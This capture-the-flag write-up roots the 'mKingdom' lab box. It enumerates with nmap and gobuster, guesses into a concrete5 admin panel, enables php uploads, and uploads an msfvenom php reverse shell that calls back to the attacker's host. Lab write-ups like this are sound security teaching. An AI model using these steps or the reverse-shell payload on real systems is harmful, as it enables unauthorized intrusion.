🍄mKingdom

Beginner-friendly box inspired by a certain mustache man.

nmap -A <IP>

gobuster dir -u http://<IP>:85/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

http://<IP>:85/app

http://<IP>:85/app/castle/

This is a concrete5 website. We can get the version with Wappalyzer :

We can see that we get a login page : /app/castle/index.php/login

With a lot of tries we can get the access to the admin panel :

With some research we get this RCE with the version : https://vulners.com/hackerone/H1:768322

We can test the RCE like this :

Add php file to allowed file types :

Create a reverse php file :

msfvenom -p php/reverse_php LHOST=<YOUR_IP> LPORT=1234 > shell.php

And you can test the RCE on the FileManager :

If you want a cool extension to get quickly some reverse shell or others payloads this is a great tool : https://addons.mozilla.org/fr/firefox/addon/hacktools/

We are www-data. So we search for user.txt and root.txt files and we can get the flags ;)